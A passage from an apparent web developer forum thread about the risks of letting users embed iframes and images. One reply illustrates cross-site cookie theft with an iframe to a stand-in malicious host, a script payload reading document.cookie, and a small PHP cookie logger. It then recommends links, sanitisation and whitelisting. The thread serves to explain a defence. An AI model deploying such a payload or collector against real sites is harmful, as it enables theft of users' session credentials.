3
Contributors
4
Replies
27
Views
3 Years
Discussion Span
Last Post by woodenduck
0

You Need a Security Encoding Library.Writing these encoders is not tremendously difficult, but there are quite a few hidden pitfalls.

1

This can be probably prevented, but I don't really find any 100% eradication solution for an iframe. For example, if you are allowing your user to do this

<iframe src="http://maliciousSitDotCom/hackTheHack.php"></iframe> 

and in the remote server the hackTheHack.php contain this

http://maliciousSitDotCom/getVictimCookie.php?email=<script>alert(document.cookie)</script>

the mailicious site can then steal the credentials of the unsuspecting users on site. They are not aware that their credentials was stolen by the remote script called getVictimCookie

The getVictimCookie.php, can be written as simple as

<?php

$file = 'stolenCookie.txt';
if(isset($_GET['email'])){

$sweetCookies = file_get_contents($file);

$sweetCookies .= "New Victim\n";

$sweetCookies .= $_GET['email'] ."\n";

file_put_contents($file, $sweetCookies);

The remote server hacks can pretend to be your unsuspecting user, using the stolen credentials for whatever the cookies would reveal.

Last thoughts, don't even use it. If they have to add content on your site, let them add it as a link. That should free you from all responsibilities and conscience overload.

If you really want to have their page included on your site, then you can use an htmlDom parser, parse the page, and then clean it up really good, create a fresh copy of the remote page on your server ( the clean one), and then deliver it to your own iframe. At least, you will have a full control on what acceptable tags are allowed..

Edited by veedeoo: info added

0

Thanks veedeoo,

You pointed me in the right direction, I found some posts talking about making a whitelist array and then parsing the user submitted material and verifiying the src domain is in the whitelist array.

How would you go about making sure img tags are secure? I don't think whitelisting any websites or whitelisting filetypes would be the answer here. Or am I overthinking that and that's exactly what I need?

This topic has been dead for over six months. Start a new discussion instead.
Have something to contribute to this discussion? Please be thoughtful, detailed and courteous, and be sure to adhere to our posting rules.